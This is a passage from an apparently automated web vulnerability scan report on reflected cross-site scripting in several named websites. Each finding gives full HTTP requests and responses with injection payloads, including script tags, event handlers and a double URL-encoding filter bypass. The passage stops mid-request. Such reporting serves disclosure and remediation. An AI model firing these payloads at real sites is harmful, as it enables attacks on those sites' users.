
Request

GET /login/index.php?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E&4c1fe'><script>alert(1)</script>9081e91ace1=1 HTTP/1.1
Host: www.rockyou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en; AAMBLFLAG=SET; lastlogin=1303164319

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:06:16 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=1132 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 505

<form method='post' id='redirect_form' action='https://www.rockyou.com/login/index.php?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E&4c1fe'><script>alert(1)</script>9081e91ace1=1'>
...[SNIP]...

4.156. http://www.rockyou.com/show_my_gallery.php [instanceid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /show_my_gallery.php

Issue detail

The value of the instanceid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f872c%3balert(1)//f24bd738e00 was submitted in the instanceid parameter. This input was echoed as f872c;alert(1)//f24bd738e00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /show_my_gallery.php?instanceid=f872c%3balert(1)//f24bd738e00 HTTP/1.1
Host: www.rockyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lastlogin=1303164637; lang=en; istack=3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; AAMBLFLAG=SET; sns_type=rockyou.com; ryuserid=deleted;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:51:23 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ctid=2; expires=Mon, 25-Apr-2011 23:51:23 GMT; path=/; domain=.rockyou.com
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:22 GMT; path=/; domain=.rockyou.com
Set-Cookie: lastlogin=1303170683; expires=Wed, 27-Jul-2011 23:51:23 GMT; path=/; domain=.rockyou.com
Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:22 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=30952 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48079

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.
...[SNIP]...
<script type="text/javascript">
thumbnailStart = 0;
embed = new appEmbed(f872c;alert(1)//f24bd738e00);
var playerWidth = 400;
var playerHeight = 300;
document.getElementById('slideshow-container').style.width = playerWidth + "px";
document.getElementById('slideshow-container').style.height = play
...[SNIP]...

4.157. http://www.socialfollow.com/button/ [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/

Issue detail

The value of the b request parameter is copied into the HTML document as plain text between tags. The payload b5bdb%253cscript%253ealert%25281%2529%253c%252fscript%253ee78b4c98452 was submitted in the b parameter. This input was echoed as b5bdb<script>alert(1)</script>e78b4c98452 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the b request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /button/?b=1649b5bdb%253cscript%253ealert%25281%2529%253c%252fscript%253ee78b4c98452 HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www3.ipass.com/mobile-employees/find-a-hotspot/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:35:11 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/javascript
Content-Length: 11739

<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warni
...[SNIP]...
<br/>var menu1649b5bdb<script>alert(1)</script>e78b4c98452={divclass:'sociallinks1649b5bdb<script>
...[SNIP]...

4.158. http://www.socialfollow.com/button/ [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/

Issue detail

The value of the b request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload fbcdd%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef42c8360436 was submitted in the b parameter. This input was echoed as fbcdd><script>alert(1)</script>f42c8360436 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the b request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /button/?b=1649fbcdd%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef42c8360436 HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www3.ipass.com/mobile-employees/find-a-hotspot/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:35:10 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/javascript
Content-Length: 11768

<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warni
...[SNIP]...
nimatedegree=(1-Math.cos((elapsed/this.effects.fade.duration)*Math.PI))/2;},setcss:function(param){for(prop in param){this.style[prop]=param[prop];}},hidemenu:function(menuid){var menu=socialfollow1649fbcdd><script>alert(1)</script>f42c8360436.menusmap[menuid];clearInterval(menu.animatetimer);menu.dropmenu.setcss({visibility:'hidden',left:0,top:0});menu.shadow.setcss({visibility:'hidden',left:0,top:0});},getElementsByClass:function(targetcl
...[SNIP]...

4.159. http://www.socialfollow.com/button/css/ [b parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /button/css/

Issue detail

The value of the b request parameter is copied into the HTML document as plain text between tags. The payload 48b8b<a%20b%3dc>fb616593d15 was submitted in the b parameter. This input was echoed as 48b8b<a b=c>fb616593d15 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /button/css/?b=164948b8b<a%20b%3dc>fb616593d15&n=10&socialSites=72%3Adigg.gif%7C75%3Afacebook.gif%7C106%3Atwitter.png%7C169%3Asocial-follow.png%7C120%3Alinkedin.gif%7C71%3Adelicious.gif%7C208%3Astumbleupon.gif%7C113%3Ayoutube.gif%7C81%3Ahubpages.png%7C167%3Agoogle-profile.png HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www3.ipass.com/mobile-employees/find-a-hotspot/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:35:19 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 5044
Content-Type: text/css

div.sociallinks164948b8b<a b=c>fb616593d15{position:absolute;left:0;top:0;visibility:hidden;display:block;padding:10px 1px 1px 1px;font:normal 12px Arial, Helvetica, sans-serif;z-index:10000;border:1px solid #cfcfd0;background:#FFFFFF;width:35
...[SNIP]...

4.160. http://www.socialfollow.com/button/css/ [socialSites parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/css/

Issue detail

The value of the socialSites request parameter is copied into the HTML document as plain text between tags. The payload e88bc%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c2c44a872 was submitted in the socialSites parameter. This input was echoed as e88bc<script>alert(1)</script>d0c2c44a872 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the socialSites request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /button/css/?b=1649&n=10&socialSites=72%3Adigg.gif%7C75%3Afacebook.gif%7C106%3Atwitter.png%7C169%3Asocial-follow.png%7C120%3Alinkedin.gif%7C71%3Adelicious.gif%7C208%3Astumbleupon.gif%7C113%3Ayoutube.gif%7C81%3Ahubpages.png%7C167%3Agoogle-profile.pnge88bc%253cscript%253ealert%25281%2529%253c%252fscript%253ed0c2c44a872 HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www3.ipass.com/mobile-employees/find-a-hotspot/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:35:36 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 4395
Content-Type: text/css

div.sociallinks1649{position:absolute;left:0;top:0;visibility:hidden;display:block;padding:10px 1px 1px 1px;font:normal 12px Arial, Helvetica, sans-serif;z-index:10000;border:1px solid #cfcfd0;backgro
...[SNIP]...
eat top left;}
li a.c81{background:url(http://www.socialfollow.com/button/images/hubpages.png) no-repeat top left;}
li a.c167{background:url(http://www.socialfollow.com/button/images/google-profile.pnge88bc<script>alert(1)</script>d0c2c44a872) no-repeat top left;}
#sfWrapper1649 .paddingSmall, div.sociallinks1649 .paddingSmall{padding-right:2px;#padding-right:0;clear: all;}
.socialFollowLink{width:100%;display:block;border:1px solid #D6D6D
...[SNIP]...

4.161. http://www.socialfollow.com/login.php [tEmail parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /login.php

Issue detail

The value of the tEmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c46ea"><a%20b%3dc>f618323402a was submitted in the tEmail parameter. This input was echoed as c46ea\"><a b=c>f618323402a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /login.php HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
Origin: http://www.socialfollow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e8cc38ceb90f5b9aed64b628c2c57c25; __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1; __utmc=131048717; __utmb=131048717.1.10.1303137471
Content-Length: 31

tEmail=Emailc46ea"><a%20b%3dc>f618323402a&pPassword=Password

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:37:08 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4520
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input name="tEmail" id="tEmail" type="text" value="Emailc46ea\"><a b=c>f618323402a" class="textBoxSize" />
...[SNIP]...

4.162. http://www.viglink.com/users/login [ar parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viglink.com
Path:   /users/login

Issue detail

The value of the ar request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e67b"><script>alert(1)</script>1985adea2ef was submitted in the ar parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users/login?_ek=yp&ar=9e67b"><script>alert(1)</script>1985adea2ef HTTP/1.1
Host: www.viglink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=383B0C6D3152B9F6F89669EF6FEDEA2A; __utma=54157999.1214478760.1303153867.1303153867.1303153867.1; __utmc=54157999; __utmb=54157999.6.10.1303153867

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Mon, 18 Apr 2011 19:27:21 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Set-Cookie: JSESSIONID=5251C7813673007E472E93A790A32B03; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 5416

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<input type="hidden" name="authRedirect" value="9e67b"><script>alert(1)</script>1985adea2ef"/>
...[SNIP]...

4.163. http://www.viglink.com/users/login [ar parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.viglink.com
Path:   /users/login

Issue detail

The value of the ar request parameter is copied into the HTML document as plain text between tags. The payload 5698e<script>alert(1)</script>ce99c61ebc1 was submitted in the ar parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E5698e<script>alert(1)</script>ce99c61ebc1 HTTP/1.1
Host: www.viglink.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=383B0C6D3152B9F6F89669EF6FEDEA2A; __utma=54157999.1214478760.1303153867.1303153867.1303153867.1; __utmc=54157999; __utmb=54157999.6.10.1303153867

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Mon, 18 Apr 2011 19:27:23 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Set-Cookie: JSESSIONID=AFD80718D54C8E99BFE116BEADEB91A6; Path=/
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 5456

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<input type="hidden" name="authRedirect" value="/users/action?"onmouseover=prompt(947209)>5698e<script>alert(1)</script>ce99c61ebc1"/>
...[SNIP]...

4.164. https://www.viglink.com/users/login [ar parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.viglink.com
Path:   /users/login

Issue detail

The value of the ar request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd498"><script>alert(1)</script>ab2bdb7200c was submitted in the ar parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users/login?_ek=yp&ar=dd498"><script>alert(1)</script>ab2bdb7200c HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=E5A9DFB004F15511014EB0A809D7A095; __utma=54157999.1214478760.1303153867.1303153867.1303153867.1; __utmc=54157999; __utmb=54157999.7.10.1303153867

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 19:28:18 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=429CA92B8479A597D30552C9302181F2; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 5416

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<input type="hidden" name="authRedirect" value="dd498"><script>alert(1)</script>ab2bdb7200c"/>
...[SNIP]...

4.165. https://www.viglink.com/users/login [ar parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.viglink.com
Path:   /users/login

Issue detail

The value of the ar request parameter is copied into the HTML document as plain text between tags. The payload 39c45<script>alert(1)</script>54c21684fb was submitted in the ar parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /users/login?_ek=yp&ar=/users/action%3F%22onmouseover%3Dprompt(947209)%3E39c45<script>alert(1)</script>54c21684fb HTTP/1.1
Host: www.viglink.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vglnk.Referrer.p=12412; vglnk.Agent.p=9575d1dc8a75bde845888cc1edb03cf2; __utmz=54157999.1303153867.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=E5A9DFB004F15511014EB0A809D7A095; __utma=54157999.1214478760.1303153867.1303153867.1303153867.1; __utmc=54157999; __utmb=54157999.7.10.1303153867

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 19:28:20 GMT
Expires: Sat, 06 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: JSESSIONID=BE4728D0077DC63E5BCC1964DAAFB5DF; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 5455

<!doctype html>
<html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>VigLink - Sign In</title>

<meta http-equiv="Content-type" content="text/ht
...[SNIP]...
<input type="hidden" name="authRedirect" value="/users/action?"onmouseover=prompt(947209)>39c45<script>alert(1)</script>54c21684fb"/>
...[SNIP]...

4.166. http://www.ypg.com/en [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 10219--><img%20src%3da%20onerror%3dalert(1)>876ba4af52c was submitted in the REST URL parameter 1. This input was echoed as 10219--><img src=a onerror=alert(1)>876ba4af52c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en10219--><img%20src%3da%20onerror%3dalert(1)>876ba4af52c HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:22:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Set-Cookie: PHPSESSID=fh9u4r4ioujp1m5s1hok6imtu1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en10219--><img src=a onerror=alert(1)>876ba4af52c)
        </p>
...[SNIP]...

4.167. http://www.ypg.com/en/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 20d27--><img%20src%3da%20onerror%3dalert(1)>2a43138dda6 was submitted in the REST URL parameter 1. This input was echoed as 20d27--><img src=a onerror=alert(1)>2a43138dda6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en20d27--><img%20src%3da%20onerror%3dalert(1)>2a43138dda6/ HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:22:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Set-Cookie: PHPSESSID=s8o0kouqh74u2emhbtb2k7omj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en20d27--><img src=a onerror=alert(1)>2a43138dda6)
        </p>
...[SNIP]...

4.168. http://www.ypg.com/en/contact-us [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b7f66--><img%20src%3da%20onerror%3dalert(1)>ad5f6912306 was submitted in the REST URL parameter 1. This input was echoed as b7f66--><img src=a onerror=alert(1)>ad5f6912306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /enb7f66--><img%20src%3da%20onerror%3dalert(1)>ad5f6912306/contact-us HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
